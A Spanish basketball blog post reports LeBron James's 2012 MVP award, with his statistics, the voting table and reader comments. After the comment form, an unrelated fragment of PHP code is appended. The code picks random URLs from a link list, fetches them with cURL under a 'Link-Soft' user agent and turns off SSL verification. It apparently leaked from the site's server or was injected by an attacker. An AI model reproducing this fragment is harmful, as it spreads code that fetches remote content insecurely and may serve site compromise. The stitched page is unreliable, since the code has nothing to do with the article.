LeBron James, MVP de la temporada

12 de May de 2012 por txusma

LeBron James se ha hecho con el premio Maurice Podoloff al mejor jugador de la temporada. Con el galardón de este año ya van tres, lo que le sitúa a la altura de mitos como Larry Bird o Magic Johnson.

Mirar los números de LeBron es como hacer un viaje al pasado: 27’1 puntos con un 53% de acierto en el tiro, 7’9 rebotes, 6’2 asistencias y 1’9 robos en 37 minutos de juego, el mínimo de su carrera. Ha sido nombrado jugador del mes en la conferencia Este en dos ocasiones (enero y febrero) y jugador de la semana en 6, lo cual eleva su registro hasta las 37 ocasiones, récord absoluto. Lleva nada más y nada menos que 419 partidos consecutivos anotando 10 o más puntos, la séptima mejor racha de todos los tiempos.

Este año su principal competencia venía de la mano de Kevin Durant y seguro que más de uno considera una injusticia que LeBron se haya llevado el premio, sobre todo por su discutible habilidad en los minutos decisivos. Lo cierto es que el jugador de los Thunder ha acabado 2º relativamente cerca de LeBron y dejando al 3º (Chris Paul) lejísimos.

Os dejamos con la lista completa de votaciones. Un cachondo el que ha votado a Joe Johnson…

Player, Team 1st 2nd 3rd 4th 5th Total Points
LeBron James, Miami 85 25 9 1 1 1074
Kevin Durant, Oklahoma City 24 83 13 1 0 889
Chris Paul, L.A. Clippers 6 5 32 35 25 385
Kobe Bryant, L.A. Lakers 2 5 30 39 30 352
Tony Parker, San Antonio 4 3 31 31 22 331
Kevin Love, Minnesota 0 0 4 6 20 58
Dwight Howard, Orlando 0 0 1 1 5 13
Rajon Rondo, Boston 0 0 0 2 6 12
Steve Nash, Phoenix 0 0 0 1 4 7
Derrick Rose, Chicago 0 0 1 0 0 5
Dwyane Wade, Miami 0 0 0 1 3 6
Russell Westbrook, OKC 0 0 0 1 1 4
Dirk Nowitzki, Dallas 0 0 0 1 1 4
Tim Duncan, San Antonio 0 0 0 1 0 3
Joe Johnson, Atlanta 0 0 0 0 1 1
Comenta

7 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Me parece increíble ver ahí votos para Duncan, Nowitzki o Joe Johnson. Rose bueno, porque cuando ha jugado ha tenido buenas estadísticas. Nash también me extraña, aunque si Phoenix ha estado ahí ahí para los play-offs ha sido por él.

      Citar

  2. Sancho88 dice:
    #2

    Hombre, Lebron te podrá gustar más o menos (soy de los que le gusta más), pero de ahí a no reconocer que se merece el premio… Durant también se lo merece, y si se lo hubiera llevado, pues también sería justo. En cualquier caso ambos se lo merecen y quizá lo más justo hubiera sido un MVP repartido. La temporada se recordará por el gran dominio de ambos. Geniales del todo!!

      Citar

  3. Ru dice:
    #3

    Merecido totalmente.

      Citar

  4. Sancho88 dice:
    #4

    la doble cinta le hace incluso más calvo de lo que es… que se quite esa mierda que tampoco está tan calvo coño. Y si lo está del todo pues se rapa al cero y punto. Jordan también era calvo y mira qué crack

      Citar

  5. Txusma dice:
    #5

    Durant y Lebron han acabado a la par pero como comento, esas dudas con el nivel de Lebron en los minutos finales podrían haberle quitado votos en favor del de Oklahoma. Para mi no es injusto, ni mucho menos, pero hubiera quedado bien un premio repartido.

      Citar

  6. simon dice:
    #6

    me gustaria saber quien coj… ha dado un 5 puesto a Joe Johnson yo flipo, a esa persona no habria que volver a dejarla votar pq total para que vote tonterias mejor que no vote… Duncan o Nowitzki bueno, yo no les hubiera dado votos pero Duncan al fin y al cabo es el segundo mejor jugador del lider del Oeste y Nowitzki en realidad si analizas su equipo es casi una proeza que se hayan metio en Play Off, ( seamos sinceremos, menos Terry y Beaubois quizá ninguno mas serviria para casi ningun equipo de Play Off… )

      Citar

  7. Lebron James Baloncesto dice:
    #7

    Lebron James es uno de los que hacen grande al baloncesto y a la NBA. Merecido premio en mi opinión el MVP a Lebron James

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>